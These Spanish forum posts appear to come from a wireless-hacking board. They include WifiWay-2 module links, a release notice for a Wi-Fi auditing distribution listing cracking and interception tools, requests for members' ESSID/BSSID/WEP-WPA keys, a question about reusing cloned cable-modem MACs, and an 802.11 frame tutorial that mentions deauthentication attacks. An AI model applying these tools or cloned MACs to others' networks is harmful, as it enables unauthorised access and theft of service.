Modulo:

Foxitreader-1.1

Descripción:

Esta utilidad sirve de la misma forma que Acrobat Reader, para visualizar documentos PDF, diferenciándose de este último en su notablemente menor consumo de recursos y mayor velocidad de ejecución.

Requisitos:

Ninguno

Descarga:

http://www.megaupload.com/?d=A03C3L6H

Imagen:

----------------------------------------------------------------------------------------------------------------


Modulo:

Skype-2.0.0.72

Descripcion:

Skype es una utilidad para hablar a través del PC con tus conocidos que promete una mayor calidad de sonido que el resto de programas de este tipo, incluso afirmando más que una llamada de teléfono ordinaria.


Requisitos:

Ninguno

Descarga:

http://www.megaupload.com/?d=SJZJS64G

Imagen:



----------------------------------------------------------------------------------------------------------------
Como instalar los modulos en WifiWay-2

Tenemos tres posibles casos:

1 - Para los que usan la Live CD de WifiWay.

Tienen que abrir la imagen ISO del CD
utilizando alguna aplicación para ello y
añadir los módulos (archivos con extensión "lzm")
en la carpeta "modules" de Wifiway. (ruta: \wifiway\modules)
y después volver a grabar la imagen ISO en un nuevo CD.

2 - Para los que usan la Live USB de WifiWay.

Simplemente tienen que copiar los
módulos (archivos con extensión "lzm")
en la carpeta del USB "modules".
cuya ruta es: \wifiway\modules\

3 - Para los que tienen Wifiway-2 instalado en disco duro o Maquina Virtual

Abren Wifiway module manager dan click en add a new module,
se abre una nueva ventana - Select LZM module - buscan la ruta
o lugar donde lo tienen, lo seleccionan y se agregara automáticamente.
La próxima vez que carguen wifiway 2 ya lo tendrán operativo.



---------------------------------------------------------------------------------------------------------------
Créditos a sus respectivos creadores, espero este trabajo sea de ayuda para todos.

Y se animen a poner sus módulos para WifiWay-2 y lo compartan con todos en este mismo post.

Saludos


------------------------

Modulo:

Gambas2

Descripción:

Es un entorno de programación similar a Visual Basic. Una vez instalado se ejecuta desde consola con el comando gambas2.

(Modulo indispensable para mis próximos proyectos que postearé en breve)

Requisitos:

Wifiway 2.0.1

Descarga:

http://www.megaupload.com/?d=QKLVAN7H


--------------------------


Modulo:

Squashfs4-tools

Descripción:

Añade al menu contestual la opcion de convertir un modulo sq3 (wifiway 1) en sq4 (wifiway 2) y biseversa.

Solo teneis que copiar el modulo en el escritorio y pulsar el boton derecho del raton para ver las opciones.

Requisitos:

Wifiway 2.0.1

Descarga:

http://www.multiupload.com/0KQ339W7HM

Imagen:


--------------------------------------

modulo con un wallpaper que se pondra automatico al arrancar wifiway2.
que alguien me diga si funciona,para hacer mas,ya que es el primer modulo que hago.

si bajasteis el modulo y no funciono, bajarlo otra vez,lo he corregido, a mi me funcionaba por que la foto la tenia en el usb,,ahora ya funciona, perdon por las molestias,.


descarga http://www.megaupload.com/?d=IETJXRSF


-------------------------------------

Modulo:

alfatools 1.0.0

Descripción:

Programa para instalar el driver alta potencia para el chipset RTL8187, así como para configurar a fondo la interfaz, incluyendo los ioctls privados tales como el highpower o el fasttx.

Requisitos:

Wifiway 2.0.1
Gambas2: http://www.megaupload.com/?d=QKLVAN7H

Descarga:

http://modulos.genocidiodigital.com/wifiway_2.0/alfatools/alfatools-1.0.0.lzm

Imágenes:




---------------------------------

Modulo:

Flashplayer-10.1

Descripción:

Es un software de tiempo de ejecución basado en navegadores y multiplataforma que ofrece una visualización sin compromiso de aplicaciones expresivas, contenido y vídeos en diferentes pantallas y exploradores.

Instrucciones:

--- Modulo muy recomendado --

Una vez instalado, ir a Firefox, herramientas, complementos, pestaña Plugins y activar el Shockwave Flash, para que todo el contenido flash se muestre sin problemas.

Descarga:

http://www.megaupload.com/?d=BX6LDBYZ
#67
www.seguridadwireless.net despues de un largo periodo en espera tiene el placer de comunicarles que esta liberada de forma publica la nueva wifiway-2.0.1

wifiway-2.0.1 pasa a ser la unica distribucion linux en el mundo que incorpora el programa wlan4xx y su asociacion con airoscript, este programa desarrollado por el equipo de cifrados, permite el analisis de auditoria wireless de las redes WLANxxxxxx, patron descodificado por el equipo de seguridadwireless.net en su sección de cifrados.

Tenemos 2 alternativas, una live normal completa, incluso el wlan4xx (mencion especial al grupo de cifrados), y una version compactada para equipo menos potentes, donde se han prencindido modulos tales como; kdeoffice, java-spoonwep, modulo firefox y modulo devel de compilacion con las fuentes bases del kernel, utilice la version que mas se adapta a sus caracteristicas.

wifiway-2.0.1 / 408 MB

http://download.wifislax.com:8080/wifiway-2.0.1.iso

http://download.wifislax.com:8080/wifiway-2.0.1.iso.md5

a9d30a4b1d6f6ae677d895a1da619ac3 wifiway-2.0.1.iso

wifiway-2.0.1-small 285 MB - la base-slax ocupa 225MB mas o menos, asi que se amplian solo 60MB para caracteristicas wireless, es poco pesada y muy rapida.

http://download.wifislax.com:8080/wifiway-2.0.1-small.iso

http://download.wifislax.com:8080/wifiway-2.0.1-small.iso.md5

07e65813771354fcfcd1cf23d79c00ce wifiway-2.0.1-small.iso

(Enlaces de descarga no oficiales al final de este post)

Kernel 2.6.35.4, muy importante este kernel, porque supone un cambio muy importante en el entorno wireless, ya que funciona de maravilla todos los nuevos adaptadores de ralink que salieron al mercado, con tasas muy altas de inyeccion de trafico. No es un kernel base, sino que se ha parcheado para adaptarlo a auditoria wireless.
kde 3.5.10 - Idiomas integrados en KDE = español e ingles

Arranque pemite determinados idiomas que no se aplican al KDE que por defecto es en español, pero si al teclado, el cual es muy util, para tratar comandos antes de entrar al entorno XWIN, lo hemos heradado de todas las wifiway.

Se prescinde completamente del sistema squashfs y se ha pasado al squashfs4, si bien podeis encontrar en la propia iso las comandos del sistema anterior en el sistema raiz antes de iniciar la live, pero todas las demas herramientas incluidas dentro de la live son ya del nuevo, asi como los menus contextuales.

No incorpora los clasicos drivers madwifi, pero si estan añadidos las viejas aplicaciones madwifi, por si se require instalar estos drivers, si bien estan en el blacklist.

Incorpora las script de las compat-wireless.

Todos los drivers funcionan con los mac80211

Basada puramente en slax y la forma de trabajo de generación de livecd de las linux-live de toda la vida, hemos retomado los incios de wifislax, y hemos prescindido del proyecto LFS, que si bien se consiguio un buenta material con la wifiway-1.0-final, su actualización es muy complicada (tanto que hemos creado esta version desde cero). Incorpora las ultimas compat-wireless estable con parche de fragmentacion. compat-wireless-2.6.36-rc5-2-s + parche mac80211.compat08082009.wl_frag+ack_v1

Ademas de los siguientes parches

[ ] channel-negative-one..> 02-Sep-2010 00:07 1.0K
[ ] fix_ath5k_no_data_in..> 23-May-2010 20:08 2.1K
[ ] ar9170_regdomain_ove..> 17-Jan-2010 14:23 1.4K
[ ] ath9k_regdomain_over..> 17-Jan-2010 14:23 1.5K
[ ] ath5k_regdomain_over..> 17-Jan-2010 14:23 1.4K


Instalador de Wifiway de forma clasica y la GUI completa.

Completamente modular, que nos permitira no tener que esperar tanto tiempo en sacar nuevas versiones. Recordemos nuestra historia, finales del 2006 las primeras wifislax, durante el 2007 mejoramos las wifislax, y nos embarcamos en las wifiway, finales del 2007, olvidamos wifislax, y sacamos la wifiway 0.8, tardamos justo un año, aun recuerdo las complicaciones de esos kerneles y las numerosas noches, para justo un año despues, a finales del 2008 sacamos la que fue un exito total la wifiway-1.0 final, y estamos parados hasta octubre del 2009, crisis de identidas junto a elaborar otros proyectos que ni recuerdo, pero lo unico que sacamos es la misma wifiway pero en version lxde, que jamas volveremos a hacer (kde forerver), justo se empieza a trabajar con la que seria la base de la nueva wifiway-2.0 pero debidos a problemas personales, estuvimos parados casi medio año, y de nuevo nos metimos a fondo para sacar esta version que lleva muchas horas de trabajo, algo asi como 11 distribucciones base antes de hacerla publica, y sabemos que aun no esta acabada, pero lo haremos ya entre todos. ya que estamos en historia, justo finales del 2008, cuando se saco la wifiway-1.0 final, me hechan de mi despacho, y empiezo a trabajar con portatiles en el sofa, creo que gane con el cambio.

Hemos prescindido del wifipacket como sistema de actualización, y a partir de ahora, usaremos el estandar de slax a traves de sus modulos lzm para futuras actualizaciones. Ya muchas personas saben trabajar con lzm y crear nuevas aplicaciones. El sistema de iso a medida, eso para cuando seamos mayores............ aunque sueño con eso.

Añadidas librerias especificas para wifiway

apr-1.3.3-1
apr-util-1.3.4-1
arping-2.09
bash
Berkeley DB-4.7.25
bison-2.3
crda-1.1.1
dbus-glib-0.82
dbus-python-0.83.1
dhcp-3.0.5
ethereal-0.10.12
flex-2.5.35
font-misc-misc-and-cursor-1.0.0
graphviz,2.26.3
gettext-0.18.1.1
iproute2-3
iw-0.9.19
libltdl7-2.2.6b-2
libncursesw5-5.7
libnet-1.1.4.1
libnids-1.23
libnl-2.0
libpcap-1.0.0
libpcre3-8.02-1
libtool-2.2.6b
libusb-1.0.8
libxft-2.1.13
lorcon2-200911-rc1
lorcon3
madwifi-tools
M2Crypto-0.20.2
openssl-1.0.0
Perl.Modules.para.WepBuster1.0_beta
psyco-1.6
pygobject-2.20.0
pygtk-2.16.0
pylorcon-1.0
python-2.5.2
Python-3.1.2
python-addons
python-support_1.0.3
python-urwid_0.9.8.4
scapy-2.1.1
sqlite-3.6.23.1
subversion-1.5.4
swig-2.0.0
tcpdump-4.0.0
Twisted-10.1.0
TwistedWeb-10.1.0
unixodbc-2.2.14
wireless-regdb-2009.11.25
zlib-1.2.3
zope.interface-3.6.1



Las librerias base podeis encontrarlas en /var/log/packages.


Aplicaciones especificas para wifiway


aircrack-ng-1.1-r1734
aircrack-ptw-1-0-0-1
airoscript-spanish
airoscript-english
airoscript viejo
afrag
AutoScan-Network-1.50
wlan4xxx
airoscript viejobib
carpeta-swireless
carpeta-wifiway
cowpatty-4.6
crunch-2.4
CrunchScript-2.0
decsagem
dsniff-2.4b1
ettercap-NG-0.7.3
feedingbottle-3.1
ferret-1.2.0
Grimwepa_1.1a2
hamster-2.0
jazzteldecrypter-2
john the ripper-1.7.6
kismet-2010-01-R1
macchanger-1.5.0
mdk3-v6
minidwep-gtk-20501
nano-2.2.5
ndiswrapper-1.54
pyrit-0.3.0
RutilT-0.18
ska
spoonwep2
spoonwpa
sslstrip-0.7
stkeys
StrinGenerator
wlan4xxx
wavemon-0.6.10
wepattack-0.1.3
Wepbuster_1.0_beta_0.7
weplab-0.1.5
wifi-radar-2.0
wificripter
wifizoo_v1.3
wireshark-1.2.9
wlandecrypter-1.3.1
wlaninject-0.7rc4
wlanreaver-0.4
wpa-supplicant-0.7.2


firefox actualizado a 3.6.8, por defecto es español, pero incorpora el idioma ingles. Actualizar desactivado, pero a diferencia de anteriores wifiway, si se puede actualizar de forma directa con conexion a internet, si bien esta desactivado por defecto, ya que estamos hablando de una live donde la memoria es impostante. Durante el desarrollo de esta descripcion de presentacion, han salido nuevas versiones del firefox, pero enteder que hay que marcar un STOP sino no acabariamos nunca, y ese fue el 3.6.8

Incorpora wlan4xx integrado en airoscript, es una herramienta especifica de seguridadwireless.net paar analizar redes patron tipo WLANxxxxxx

Casi la totalidad de aplicaciones graficas podemos localizarlas en el menu Wifiway.

No es un producto beta al estilo de otras distribucciones, debido a la gran totalidad de aplicaciones y drivers wireless linux, se hace imposible reparar todos estos elementos, no somo responsable de mantener dichas aplicaciones.

Toda la serie wifiway 2.0 llevara el mismo fondo de pantalla, y seguidamente seran sacadas versiones nuevas, esperemos que una por mes, cuyo formato de numeracion sera 2.0.0 . 2.0.1 -------- asi seguidamente. Esa era la idea cuando escribia esta descripcion, pero se estan desarrolando nuevos fondos.

Si mantedremos una explicacion de las diferencias entre versiones. Esta forma de trabajar modular, nos permitiria ser mas rapidos que todas las demas distribucciones, algo que actualmente exige el mercado de las continuas revisiones de las compat-wireless, los kerneles, en definitiva de la gran cantidad de drivers y aplicaciones especificas wireless que salen actualmente al mercado.

Ademas se podran incorporar rapidamente todas las nuevas MAC que puedieran salir en los determinados lanzadores de wifiway relacionados con los temas de cifrado.

Si disponemos de una pendrive y vamos a trabajar en modo liveusb, la mejor forma de guardar los datos, es usar los menus contextuales de la live, o el MOdule manager wifiway para la creacion de modulos lzm, y añadirlos a la carpeta raiz del usb, /wifiway/modules/

Pd: No nos olvidamos de los patrones WLAN_XXXX....................., y las nuevas atheros, tambien vamos a por vosotras, que me estan llegando en camino.

Por ejemplo la WIFIStation EXT, si bien aun a pesar de retrasar el lanzamiento para ver si podiamos darle soporte, hemos incluidos los fw adecuados asi como el ath9k_htc modificado para el ID de este dispositivo, se carga bien en memoria, pero la interface no aparece, lo que me llega a dudar de todos los copy-paste del mismo manual que hemos leido de esta usb atheros.

!Pero dar por hecho que entre todos lo conseguiremos!

Mas para el futuro, un nuevo menu organizado exclusivo para WPA, y fondos de pantalla mas atractivos, si bien personalmente ya sabeis lo que opino de la estetica, y mi importancia de siempre a temas de drivers, pues porque hay se empezo todo, cuando los grandes, no sacaban y ni sacan las aplicaciones y drivers que necesitamos.

Para los de windows, decirme si windows permite la cantidad de drivers especificos que lleva la wifiway-2.0.1 o si podeis usar los mostruos nuevos de 2W de la serie ralink 2800, que por cierto pronto vereis en seguridadwireless.net tambien nuevos proyectos exclusivos para windows, que tambien sabemos y muchos, del click click megaclick siguiente continuar.

Ahora los segundones y copiones de siempre, ya podeis ponerla a parir, alabando las cosas que hacen los estranjeros y despotricando que lo que es nacional, viva españa......... YO SI SOY ESPAÑOL.

por cierto esta lives, montadas por inexpertos, no quema las CPU de los portatiles, quizas los cerebros si, sobre todo la Alfa Network AWUS036NH, pero para eso hay que tenerlo........... y dudo de eso.

Saludos al equipo de cifrados, que esta dando mucha guerra y la que dara, a los demas solo le quedara ocultar creditos y verlas venir de lejos, y lo que teneis exclusivo, pues sorpresas pronto habra.

Mencion especial a elmanuvolador, el ya sabe porque, de las largas horas que ha compartido conmigo en el desarrollo de aplicaciones, bueno al reves, el me dejo compartirlas, porque el curro duro lo hizo el.

Y un saludo final, a una tienda que en sus inicios les salvemos el culo y que nos dejaron tirados, y me robaron las ideas, y se asociaron despues con quienes ponian a parir, y mantuvieron muchas cosas, aunque su numero de registrados no lleva ni a 600, mi saludo es este, se puede enñagar a una persona todo el tiempo, a muchos poco tiempo, pero ni de coña, podeis engañar a todos de forma eterna, caminantes somos y en el camino nos encontramos, y luego les explicas la diferencia de 20 leuros en uns usb de 35 euros. Pondria el enlace pero estan baneados.

Pd: Y eso que me tome la medicación, imagina sino lo hubiera hecho.

Personal: En memoria de un ser querido que perdi hace no mucho, que me enseño a vestirme por los pies, a ser un hombre de honor, a no hacer daño a los demas, a dejar vivir tranquilo, a ser un buen padre para mis hijos, un buen compañero, un buen amigo, a morir por la familia, a trabajar duro para que los tuyos tengan lo mejor, a ser humilde, ya no esta con nosotros, no se donde esta exacatemente, pero tengo muy claro siempre, por lo menos 4 veces al dia, ya que siempre lo recuerdo al ir a trabajar, porque cuando era pequeño me llevaba a su fabrica y donde yo estoy los vestuarios son similares, que siempre me observa, que esta atento a todo lo que hago, espero no defraudarlo alli donde esta, te hecho de menos cabron ......................... dedicado al ultimo malospelos.

Hwagm


-------------------

Novlucker
wifiway-2.0.1.iso (full) y wifiway-2.0.1-small.iso
mediafire
http://bit.ly/_wifiway

MadAntrax
wifiway-2.0.1.iso (full)
http://www.megaupload.com/?d=CUHYA4R8

wifiway-2.0.1-small.iso
http://www.megaupload.com/?d=TLJYJIAR

Password: wifiway 2.0.1 small
(sí, el password es ese, todo lo que hay en negrita. Se escribe en minúsculas y con espacios y todo)

-=[ §ßÑÐØ ]=-
wifiway-2.0.1.iso (full)
http://www.megaupload.com/?d=YQV054ZO
http://www.megaupload.com/?d=G4U5K37M
http://www.megaupload.com/?d=JY3SQJND
http://www.megaupload.com/?d=GOZQCSWU
http://www.megaupload.com/?d=5LV9672R

reyesfra
wifiway-2.0.1-small.iso - 285 megas (MB)
MD5: 07e65813771354fcfcd1cf23d79c00ce
Descargar: http://hotfile.com/dl/74975938/6e93bef/wifiway-2.0.1-small.iso.html


Wifiway-2.0.1 - 408 megas (MB)
MD5: a9d30a4b1d6f6ae677d895a1da619ac3
Descargar Parte 1: http://hotfile.com/dl/74984006/404941b/wifiway-2.0.1.zip.001.html
Parte 2: http://hotfile.com/dl/74988768/af7c771/wifiway-2.0.1.zip.002.html
#68
Hacking Wireless / Redes ONOXXXX
15 Septiembre 2010, 09:42 AM
Buenas:

Cualquier user que quiera colaborar.. que me remita ESSID + BSSID + Clave WEP/WPA

Un saludo

ChimoC
#69
Buenas:

Este verano (finales de Julio principios de Agosto) voy 13 días a Colombia con mi mujer.

En principio quiero ir 3-4 días a Bogotá, 3-4 Cali, 3-4 Medellín, y me gustaría que alguien de allí me indicase qué lugares no me debo perder (y zonas a las que NO ir por motivos diferentes)

Siempre he pensado que los foráneos conocen lugares que deben ser visitados.

Un saludo

ChimoC
#70
Buenas:

Tengo un problema con unos clientes y el servidor ISP.

Querría preguntaros si es posible usar MACs clonadas de una población "X" en una población "Y", o si por el contrario las MACs clonadas deben ser siempre de la misma ciudad o nodo...

Es decir, si una MAC de un cablemodem en Valencia sirve en Burgos o en Barcelona o en Segovia.

He leido que la gente dice que la MAC debe ser del nodo y/o población... pero también he leido que eso no es cierto... y la verdad es que no estoy muy puesto en el tema.

¿Alguien podría aclarármelo?

Un saludo

ChimoC
#73
Buenas:

Solicito que aquellos usuarios que puedan aportar datos de las siguientes ESSIDs lo hagan por privado a cualquiera de los moderadores.

ONOXYXY

ORANGE-XXXXXX

FTE-XXX

WLAN-XXXX

WLAN_XX

WLANXXXXXX

TELE2

THOMSONXXXYYY

Necesitamos: ESSID, BSSID, CLAVE WEP/WPA, MODELO DE ROUTER, CANAL
#74
Buenas:

Acabo de recibir un TG585 v7 un poco cascadete y busco el firmware original de orange.

Alguien tiene este aparatejo y me puede mandar el firm, o bien algun link de descarga del firm original, o alguien que lo haya probado con algun otro firm (el 8.2.2.4 no me funciona para IP Fija)

Un saludo

ChimoC


#75
Hacking Wireless / WPA 100% Decrypted
23 Julio 2009, 10:16 AM
Buenas:

Con el permiso de mi amigo unbas y como siento exactamente lo mismo que él.

Veamos como enfoco ésto .....

Ante todo pediros disculpas si alguien se siente ofendido ademas de por el pequeño engaño del título y también daros las gracias a quienes os molestéis en leer esto:

Llevo días haciendo limpieza en los subforos de hacking wireless, post movidos y cerrados, me parece absolutamente increíble la cantidad de chorradas que se han eliminado y no hablo de 5 o 6 hablo de muchísimos más (que no son pocos).

Yo también he preguntado "sandeces" (todos podeis ver en mi perfil los posts que he hecho), pero os doy mi palabra que antes de preguntar me he roto la espalda buscando información. O bien he pedido no una solución sino que me diesen libros por leer que yo pondría el empeño en intentar comprenderlo.

Es más... tengo carpetas llenas de apuntes hechos a mano con lso pasos que iba siguiedo...

A donde quiero llegar es que TODOS, incluso el staff, muchas veces tenemos preguntas que cualquier persona nos puede responder... incluso el Tito Google. La verdad es que no se que pensáis sobre lo que conlleva el mantenimiento de un foro por parte del staff, pero os aseguro que es un "curro" duro y que muchas veces acaba quemando a la peña, a mi particularmente (y como supongo que a muchos otros) no nos gusta estar quemados, ni tener "broncas" con la gente por cerrarles un post, o que nos llamen tal o cual cosa por privado ( :-\ ) ya que la información o lo que intentamos tener y recopilar aquí es información general sobre algo que nos gusta y que por ello es un hobby. Aqui venimos a disfrutar y a compartir lo que sabemos con los demás

¿Tan difícil es buscar un sitio adecuado para hacer una pregunta? Linux en Hacking Wireless Linux (Wifislax, Wifiway, Bt, Ubuntu...)

¿Tan difícil es buscar una respuesta a una pregunta? Hay uhn botón buscar en el foro... o bien Google o el buscador que más os guste.

Muchos de los mensajes eliminados eran tal que "Problemas con airoscript" Pero DIOS MIO! ¿como se pueden tener problemas con un script de automatización? otras de las grandes preguntas es ¿que usb me compro? ¿Funciona con las Distribuciones?. Y yo me pregunto pero ¿de verdad estas preguntas son necesarias? ¿de verdad que no se obtiene respuesta en el foro? Sinceramente no me puedo creer que alguien tenga problemas con el airoscript, o que no sepa o llegue a saber que tarjetas/chipsets son compatibles con el modo monitor. Hay que LEER, o simplente saber tu CHIPSET y buscar (seguro que en menos de 1 día descubres si es o no compatible... y habrás aprendido a ¡hacer una búsqueda!)

Hace años estas cosas eran bastante complicadas; de hecho se pueden encontrar preguntas/charlas sobre estos temas de cuando esto era jodido de tratar/encontrar... pero hoy en día hay mogollón de información, se intenta que la información este lo mas accesible posible y ni con esas.  :-\

Os lo digo de corazón me siento un poco frustrado al intentar hacer que las cosas funcionen como es debido, ademas de eso que la información este lo mas accesible posible y lo único que hago en el foro es "despachar" mensajes cerrados o movidos por no estar en la zona debida o hacer preguntas a las que no damos soporte (no ayudamos a entrar a la red wifi de nadie.... ni aunque estés sin un dolar o euro....(lo sentimos mucho pero es así))

Otra de la que me fascina es ver como la gente es capaz de cambiar de nombre a los programas/scripts/hardware

airoscript = aerostip/aeroskip ¿Tan difícil es el nombre Real?

Wifislax = Wirilas/wifi as/ el programa ese de linux/ wi las ¿Tan difícil es decir/escribir Wifislax?

¿Tan complicado resulta saber que no es un programa, sino una distribución GNU/Linux?

Verdaderamente hay una larga lista de "apodos" como pasa con las tarjetas Usb Wireles ¿que manía tiene la gente en decir que son antenas? ¿No hay información suficiente en Internet?

Creo que el "quid" de la cuestion es ¿tanta prisa teneis en hacer/aprender algo que no podeis pararos a leer? Hay preguntas que se hacen que no tardas más de 10 segundos en encontrarlas en el foro... pero claro, es más fácil preguntar porque alguien me responderá y mientras tanto yo estoy rascándome las pel....

Bueno esto es todo y queda mi pequeña y humilde "protesta" plasmada, tened en cuenta que un foro se hace entre todos, por mucho que luchemos por hacer algo sin la colaboracion adecuada no sive de nada.

Un saludo

ChimoC

PD: Como mi amigo unbas.... estoy preparado para que me lluevan ostias... pero de verdad que tenía que soltarlo ya  ;D

P.D.2: NO lo pongo en el libre ni en ningún otro sitio porque únicamente va dedicado a los users de Hacking Wireless.... si bien aun poniéndolo aqui... más de uno va a seguir haciendo lo que le pase por el "Arco de Triunfo" (me apuesto pincho y caña a que de aqui al domingo podría cerrar/mover más de 20 posts por incumplir las normas)

Gracias por leerme  ;D
#76
Buenas:

Como el tema me ha parecido muy interesante e instructivo, aquí os dejo un copy/paste de un nuevo taller de Vic_Thor.

El link del post original lo podeis ver aquí.

El copy/paste es:

PROTOCOLO 802.11. TALLER WiFi.

Durante estas últimas semanas este foro ha estado ha estado "animado", también he recibido muchos mensajes privados  acerca del comportamiento las redes WiFi protegidas (WEP/WPA) y me he dado cuenta , que si bien mas o menos todos  conocemos "la práctica" de cómo atacar redes inalámbricas, la práctica totalidad de las preguntas que me  habéis hecho se resuelven con un BUEN CONOCIMIENTO teórico de cómo es el comportamiento de las mismas.

Es decir, muchos de nosotros "sabemos" usar herramientas del tipo aricrack-aireplay-airodump-etc---  pero pocos tienen claro por qué funcionan y por qué resulta (a veces sencillo, a veces no tanto) obtener una  clave wep o wpa.

Por eso, he tirado de mis apuntes (aquellos con los que sufren mis queridos alumnos) y les he dado una aspecto   algo informal, espero que el resultado sea bueno.

Voy a seguir la misma iniciativa de nuestro "querido" Taller TCP/IP esperando que este nuevo se convierta en  un Taller WiFi.

Este hilo permanecerá cerrado, los comentarios y dudas las resolveremos en otro (como en  el Taller TCP/IP)

Si prestáis atención a todo lo que voy a ir comentado y cuando tengáis una duda repasáis los contenidos que vamos a  esbozar seguro que además de "usar" esas herramientas, comprenderéis cómo funcionan y cómo podemos  modificarlas para realizar ataques "mas refinados" o por pura "curiosidad"

Deberíamos comenzar por la capa física, esto es, señales, antenas, bandas de radiofrecuencia, dispositivos,  tarjetas... Ufff, un sin fin de conceptos y conocimientos que (para lo que se trata en este momento) diremos que  "sobra".

Por tanto, nos hemos de creer dos cosas para saltarnos la capa física de un plumazo:
    1.- Un
Punto de Acceso es un aparato que permite conectar estaciones inalámbricas entre sí o  incluso estaciones inalámbricas con estaciones por cable.

También un Punto de acceso puede comunicarse con otros puntos de acceso extendiendo la zona inalámbrica o creando un  perímetro inalámbrico mas grande, es lo que se conoce con el nombre de WDS.

2.- Una estación inalámbrica es un dispositivo que puede comunicarse con un punto de acceso y por  consiguiente, con el resto de estaciones inalámbricas o con estaciones con cable.

También una estación inalámbrica puede comunicarse directamente con otra sin necesidad de punto de acceso, es lo que  conocemos como comunicación ad-hoc.[/list]En nuestro estudio nos va a interesar mas "cómo acceden al  medio" tanto las estaciones como los puntos de acceso, esto es, lo que se llama Capa 2 en los modelos  de comunicaciones.

Si entendemos bien la capa 2 en las comunicaciones inalámbricas, entenderemos, comprenderemos y seremos  capaces de escenificar los ataques contra las vulnerabilidades en redes inalámbricas, incluidos los ataques a  cifrados y otros como la denegación de servicios, hombre en medio, despliegue de puntos de acceso ilícitos o  reinyección de tráfico en la red.

El tráfico en la capa 2 se le llama tramas (frames en inglés) no es que sea muy importante saber el nombrecito...  pero  mejor llamar a cada cosa por su nombre.

Un Punto de Acceso tiene:

    *   Un nombre al que llamamos SSID (o essid)
    *   Una Dirección MAC que llamamos BSSID
    *   Un modo de distribución: Infraestructura, Repetidor, Cliente y algún otro mas.
    *   Seguridad y/o cifrado: WEP, WAP, WPA2, sin seguridad (OPEN)
    *   Clientes: Las estaciones inalámbricas que se conectan a ellos
    *   Enrutamiento: Capa2 y también los hay de Capa3 (no todos)
    *   Una fuerza de la señal aplicada a cada paquete
    *   Un alcance que depende de factores como la antena, el entorno, obstáculos, etc.
Un  punto de acceso, envía y recibe:
    *   Tramas de Administración: Beacons, Probes y Request
    *   Tramas de Datos: Cifrados o en "texto plano"
    *   Tramas de Control: RTS, ACK's y CTS
Esto anterior no refleja "todo" lo que un punto de acceso  tiene, envía y recibe...  pero nos acerca bastante a la realidad de los mismos.

Es importante señalar que la forma de comunicarse en redes inalámbricas (WiFi) está estandarizado, de  ahí tenemos el archiconocidos 802.11, junto con sus "variantes" a,b,c,d,e,g,h,i,n etc... cuando  encontremos documentos o información relativa a 802.11b u 802.11e, etc debemos de asumir que la comunicación está  "ordenada", "regulada", "estandarizada", "definida" mediante esos estándares.

No obstante, existen fabricantes que además de "soportar" el estándar , también implementan cambios y  modificaciones de "cosecha propia", es decir, pequeñas o grandes variaciones sobre el protocolo de  comunicaciones que dicho fabricante añade.

Ni que decir tiene, que esos "añadidos" al ser particulares de un determinado fabricante, podrán sólo usarse  entre equipamientos del mismo fabricante.

Esos añadidos (que a la postre deberían convertirse en mejoras) pueden ser un obstáculo cuando entran en escena otro  hardware de diferente fabricante, sin embargo, y a menos que el administrador de la red inalámbrica así lo decida,  siempre serán compatibles con los estandarizados.

Está muy claro, pero con un ejemplo quedará todo cristalino (si es que hay algo que aclarar):

    Ya es conocido que existe un tipo de tramas "
especial" que al enviarlas de forma "mal  intencionada" los clientes que están asociados a un punto de acceso se "desconectan" del mismo, es lo que  llamamos disociación.

¿Por qué es esto posible? Porque las tramas del tipo disociación que un punto de acceso envía a un  cliente o a todos no están protegidas ni cifradas de forma alguna. Esto ocurre siempre, tanto si usamos WEP-WPA como  si no.

CISCO, incorpora un "añadido" especial a este tipo de tramas...  el llamado CCX que  no es otra cosa que un control de integridad de las tramas de disociación (y no sólo de ellas) de forma que el  ataque de disociación no sería efectivo.[/list]Pero claro, como decíamos antes, sólo si usamos hardware de CISCO en  todo el perímetro de la red inalámbrica sería factible implementar dicha característica.

Aunque son documentos "muy técnicos" (y de eso precisamente quiero huir en esta explicación) quien lo desee  puede consultar libremente los modelos para 802.11, 802.11a, 802.11b, ... En::  http://standards.ieee.org/getieee802/

Después de esta breve introducción vamos a desmenuzar cómo es una trama de datos en 802.11.



Explicamos (de derecha a izquierda)

FCS es un campo de 4 bytes que se añade como control de Secuencia, no debemos  preocuparnos de ello por ahora.

Cuerpo. Es el contenido de la comunicación (los datos a transmitir), si no usamos seguridad  alguna lo podremos ver "en texto plano" como si tal cosa, si es un icmp, un intercambio TCP, etc...  Si está  cifrado mediante WEP o WPA pues "de momento" no tiene sentido lo que "vemos".

Cabecera MAC: Lo primero que nos llama la atención es que su tamaño "puede variar".

Variar? Por qué?

Porque dependiendo del tipo de mensaje y de otras funcionalidades (por ejemplo si se utiliza QoS o no) puede  ser de un tamaño u otro, lo que siempre existe en la cabecera MAC es esto:



Y cuando son 26 ó 30 ó 32??

Cuando concurra alguna de estas circunstancias:
    *
QoS (Calidad de Servicio) protocolo 802.11e está habilitado

* La comunicación se realiza entre puntos de acceso.[/list]
Si utilizamos QoS, se añaden 2 bytes para el control de las colas QoS después de la tercera dirección  MAC, o si lo prefieres, antes del número de secuencia

Si la comunicación es "entre" puntos de acceso, se añade una cuarta dirección MAC (la del otro punto  de acceso) inmediatamente después del número de secuencia, como ya sabemos una dirección MAC tiene 6 bytes.

Por eso podemos tener cabeceras MAC de varias "longitudes", por ejemplo:

24 bytes -> Comunicación entre cliente y punto de acceso, sin QoS
26 Bytes -> Comunicación entre cliente y punto de acceso, con QoS
30 bytes  -> Comunicación entre puntos de acceso, sin QoS
32 bytes -> Comunicación entre  puntos de acceso, con QoS

También hay que hacer una salvedad en cuanto a las 3 direcciones MAC que hablaba...  en el ejemplo puse  origen-destino-bssid, no es así realmente... Todo dependerá de si se trata de una trama de administración,  de datos o de la dirección del tráfico.

Es decir, la dirección MAC1 (los bytes 4-5-6-7-8-9-10) pueden representar el bssid, la dirección MAC origen  e  incluso la dirección MAC destino. Lo mismo ocurre con las otras dos direcciones MAC, MAC2 y MAC3.

Todavía es pronto para "comprender" bien este "baile" de direcciones MAC, de momento nos quedamos que  MAC1, MAC2 y MAC3 representan las direcciones origen, destino y bssid de la comunicación PERO NO PRECISAMENTE  Y SIEMPRE EN ESE ORDEN!!!!!

Llegados a  este punto, Cómo se sabe si se trata de una trama de control, de administración o de  datos???

Por los dos primeros bytes de la cabecera MAC, esto es, el FC o Frame Control

Al ser un campo de dos bytes contiene 16 bits de información correspondiente al tipo de trama, al subtipo, a si la  comunicación ve "hacia" el punto de acceso, si va "hacia" el cliente, si está fragmentada, si hay mas datos, si se  trata de una trama retransmitida, y otros...  como si los datos van o no cifrados, si se utiliza "power management"  (administración de energía)... .

